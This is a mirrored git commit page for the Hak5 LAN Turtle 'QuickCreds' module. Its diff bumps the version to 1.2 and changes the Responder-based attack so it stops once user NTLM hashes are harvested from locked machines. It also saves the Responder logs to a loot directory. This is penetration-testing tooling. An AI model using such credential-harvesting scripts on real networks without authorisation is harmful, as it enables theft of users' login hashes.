hak5
/
lanturtle-modules
mirror of https://github.com/hak5/lanturtle-modules.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merged PR (#17) - Fixes and improvements to QuickCreds 

* Modified Script to fix a couple of issues

Made the following changes:
 Modified check script to only stop when User credentials were harvested.  Machine credentials are often captured by Responder and are next to useless on a penetration test.  Machine credentials have a $ as the last digit of the username.  I also purge the Responder logs correctly at the start of the script and then make a copy of the logs directory to the current loot numbered directory before the cleanup.

* Bumped version to 1.2 to fix 2 issues

Made the following changes:
1. Modified check script to only stop when User credentials were harvested. Machine credentials are often captured by Responder and are next to useless on a penetration test. Machine credentials have a $ as the last digit of the username.

2. I also purge the Responder logs correctly at the start of the script and then make a copy of the logs directory to the current loot numbered directory before the cleanup.
pull/20/head
Patrick Kiley 2016-10-12 17:10:04 -05:00 committed by Sebastian Kinne
parent 634bae3a83
commit adf6747518
1 changed files with 7 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
modules/QuickCreds
View File

@ -1,5 +1,5 @@
#!/bin/bash /usr/lib/turtle/turtle_module
VERSION="1.1"
VERSION="1.2"
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink rapidly while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix."
CONF=/tmp/QuickCreds.form
@ -114,7 +114,8 @@ echo "Starting attack..." >> /root/loot/responder.log
cd /root/loot
dircount=$(ls -lad /root/loot/* | wc -l)
mkdir /root/loot/$((dircount))
rm /etc/turtle/Responder/logs
# Delete all current Responder logs
rm /etc/turtle/Responder/logs/*
ln -s /root/loot/$((dircount)) /etc/turtle/Responder/logs
# Stop dnsmasq
@ -125,11 +126,14 @@ screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I
# Blink upon hash capture
while true; do
if [ -e /etc/turtle/Responder/logs/*NTLM* ];
# Grep for user creds and do not match on machine creds, machine usernames end in $
if [ $(grep -v '\$:' /etc/turtle/Responder/logs/*NTLM* 2>/dev/null) ];
then
if [[ ! $(cat /root/loot/responder.log | tail -n1) == *"Creds"* ]]
then
echo "Creds saved!" >> /root/loot/responder.log
#copy all responder logs to loot directory
cp /etc/turtle/Responder/logs/* /root/loot/$((dircount))
finished
fi
fi